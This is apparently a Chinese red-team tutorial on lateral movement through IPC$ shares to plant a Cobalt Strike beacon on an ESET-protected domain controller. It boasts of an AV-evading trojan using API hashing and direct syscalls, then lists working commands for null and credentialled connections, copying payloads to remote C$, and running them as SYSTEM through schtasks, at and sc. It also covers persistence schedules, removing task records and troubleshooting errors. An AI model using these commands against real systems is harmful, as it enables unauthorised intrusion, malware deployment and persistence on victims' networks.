虽然说上线eset,其实没啥新技术,主要是木马是免杀的,用的API Hash+直接syscall,以及CS4.4 beacon stagerless 因为CS4.2估计被卡巴识别了,同样技术CS4.4可以,但CS4.2不可以

前言

Ipc$(internet process connection)是共享”命名管道”的资源,是为了让进程间通信而开放的命名通道, 可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

IPC作用

利用IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。

利用条件

  1. 139、445端口开启
  • SMB: (Server Message Block) Windows协议族,用于文件打印共享的服务;
  • NBT: (NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
  • 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现

对于win2000客户端(发起端)来说:

  • 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
  • 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。

对于win2000服务器端来说:

  • 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
  • 如果禁止NBT,那么只有445端口开放。

我们建立的IPC会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,IPC会话是无法建立的。

总结

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示 netbios协议的应用,我们可以通过139,445端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是 需要139或445端口来支持的
image.png

  1. 管理员开启了默认共享:默认共享是为了方便管理员远程管理而默认开启的共享,即所有的逻辑盘 (c$,d$…)和系统目录windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问。

连接

  1. net use \\127.0.0.1\ipc$ "password" /user:"username" #建立连接
  2. net use \\127.0.0.1\c$ "password" /user:"username"
  3. net use #查看存在的连接

image.png
image.png
image.png

CS小技巧

CS的文件浏览功能是带token的,直接通过一个域管权限的session,只要目标PC 445开启,直接\xx.xx.xx.xx\C$、\xx.xx.xx.xx\D$ 方便极了。

IPC共享链接上线eset域控 - 图5

这里由于卡巴那台机器出了点小状况,便用LN师傅图进行讲解

常用命令

  1. 0.建立空连接
  2. net use \\192.168.1.1\ipc$ "" /u:""
  4. 1.建立正常连接
  5. net use \\192.168.1.1\ipc$ "1qaz@WSX" /user:"Administrator" 
  7. 2.查看本机连接共享情况
  8. net use
  10. 3.查看已建立连接目标主机的共享资源
  11. net view \\192.168.1.1
  13. 4.查看目标主机时间
  14. net time \\192.168.1.1
  16. 5.查看目标主机的NetBIOS用户(自己本机也需开启)
  17. nbtstat -A 192.168.1.1
  19. 6.删除本机与指定ip建立的连接
  20. net use \\192.168.1.1\ipc$ /del /y
  22. 7.删除本机所有已建立的连接
  23. net use * /del /y
  25. 8.文件的上传下载
  26. copy plugin_update.exe \\192.168.1.1\c$\windows\temp\plugin_update.exe
  27. [推荐用xcopy]:
  28. xcopy d:\sqlitedata\*.* \\192.168.1.1\c$\temp /E /Y /D
  29. (上传本地文件到目标的:c\windows\temp\目录下)
  30. copy \\192.168.1.1\c$\plugin_update.exe c:\
  31. (下载目标文件到本地c盘下)
  33. 9.创建计划任务之schtasks
  34. schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 192.168.1.1 /RU System /u administrator /p "1qaz@WSX"
  35. 立即执行计划任务
  36. schtasks /run /tn "plugin_update" /S 192.168.1.1 /u administrator /p "1qaz@WSX"
  37. 删除计划任务
  38. schtasks /F /delete /tn "plugin_update" /S 192.168.1.1 /u administrator /p "1qaz@WSX"
  39. 计划任务远程开启默认共享{注意查看目标主机时间}
  40. schtasks /create /tn "plugin_update" /tr "cmd /c net share c$=c:" /sc once /st 16:25 /S 192.168.1.1 /RU System /u administrator /p "1qaz@WSX"
  42. 10.创建计划任务之at
  43. at只支持win03和部分老版本win08,一般情况下,win08-SP1的系统是能添加at计划任务的,但不一定执行,推荐win08及之后的系统都选择schtasks创建计划任务)
  44. at \\192.168.1.1 14:05 cmd /c "c:\windows\temp\test.bat" 
  46. 11.SC创建服务
  47. (需先IPC连接,添加的常规程序需要有返回值,不然启动服务时会报1053错误)
  48. sc \\192.168.1.1 create shellsrv binpath= "c:\shell.exe" start= auto displayname= "shellstart"
  49. sc \\192.168.1.1 create test binpath= "c:\windows\temp\test.bat" start= auto displayname= "shellstart"
  50. sc \\192.168.1.1 start shllsrv
  51. sc \\192.168.1.1 stop shllsrv
  52. sc \\192.168.1.1 delete shellsrv
  54. 12.删除默认共享
  55. net share c$ /del
  57. 13.恢复默认共享
  58. net share c$=c:
  60. 15.对方的c盘映射为自己的z盘,其他盘类推(不推荐)
  61. net use z: \\192.168.1.1\c$ "1qaz@WSX" /user:"administrator"
  63. 16.删除映射的c盘,其他盘类推
  64. net use c: /del

上线

  1. tasklist /S 192.168.10.131 /U administrator -P 密码

image.png
image.png
eset哦,好兄弟

方法一

  • 查看目标系统时间:net time \192.168.10.131
  • 将本目录下的指定文件复制到目标系统中:copy vps.exe \192.168.10.131\c$
  • 使用at创建计划任务:at \192.168.10.131 17:00:00 C:\vps.exe
  • 清除at记录:at \192.168.10.131 作业ID /delete
  • 使用at命令执行,将执行结果写入本地文本文件,再使用type命令查看该文件的内容:at \192.168.10.131 17:00:00 cmd.exe /c “ipconfig > C:/1.txt “
  • 查看生成的1.txt文件:type \192.168.10.131\C$\1.txt

方法二

Windows Vista、Windows Server 2008及之后版本的操作系统已经弃用at命令,而转为用schtasks命令
故第一种不做演示

  1. 在目标主机上创建一个名为test的计划任务,启动程序为C:\vps.exe,启动权限为system,启动时间为每隔一小时启动一次
  2. schtasks /create /s 192.168.10.131 /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f
  4. 其他启动时间参数:
  5. /sc onlogon  用户登录时启动
  6. /sc onstart  系统启动时启动
  7. /sc onidle   系统空闲时启动
  9. 查询该test计划任务
  10. schtasks /query | findstr test
  12. 启动该test计划任务
  13. schtasks /run /s 192.168.10.131 /i /tn "test"
  15. 删除该test计划任务
  16. schtasks /delete /s 192.168.10.131 /tn "test" /f
  18. sc命令创建计划任务
  19. copy test.exe \\192.168.10.20\c$
  20. sc \\192.168.10.20 create test binpath= "c:\test.exe"
  21. sc \\192.168.10.20 start test
  22. sc \\192.168.10.20 del test

image.png
image.pngimage.png

这里如果是360的话,估计schtasks会拦截,这个eset没有拦截

常见错误号

  1. 错误号 5,拒绝访问【很可能你使用的用户不是管理员权限的,先提升权限】
  2. 错误号 51Windows 无法找到网络路径【网络有问题】
  3. 错误号 53,找不到网络路径【ip 地址错误;目标未开机;目标 lanmanserver 服务未启动;目标有防火墙(端口过滤)】
  4. 错误号 67,找不到网络名【你的 lanmanworkstation 服务未启动;目标删除了 ipc$;】
  5. 错误号 1219,提供的凭据与已存在的凭据集冲突【你已经和对方建立了一个ipc$,请删除后再连】
  6. 错误号 1326,未知的用户名或错误密码【原因很明显了】
  7. 错误号 1385,登录失败:未授予用户在此计算机上的请求登录类型
  8. ---
  9. 情况1:可能是你在“拒绝从网络访问这台计算机”功能中拒绝了该用户的访问,解决方法如下:
  10. 开始-->运行-->gpedit.msc计算机配置-->Windows设置-->安全设置-->本地策略-->用户权利指派-->拒绝从网络访问这台计算机-->删除你要正常连接的用户
  11. 情况2
  12. (1)网络访问为:经典
  13. (2)来宾账户状态:已启用,
  14. (3)拒绝从网络访问这台计算机里有Guest用户或组
  15. (4)你执行net use \\xxx.xxx.xxx.xxx\IPC$ "123456" /user:"xxx" 输入的用户名是随便输入的,这时也会遇到这个错误信息,因为当你连接的用户不存在时,net use会默认用Guest用户来进行连接,而Guest用户已拒绝从网络访问,所以也会出现这种错误
  16. ---
  17. 错误号 1792,试图登录,但是网络登录服务没有启动【目标NetLogon服务未启动[连接域控会出现此情况]】
  18. 错误号 2242,此用户的密码已经过期【目标有帐号策略,强制定期要求更改密码】

关闭共享

  1. net  share  ipc$    /delete              关闭ipc默认共享
  2. net  share  c$      /delete              关闭C盘默认共享
  3. net  share  admin$  /delete              关闭admin$默认共享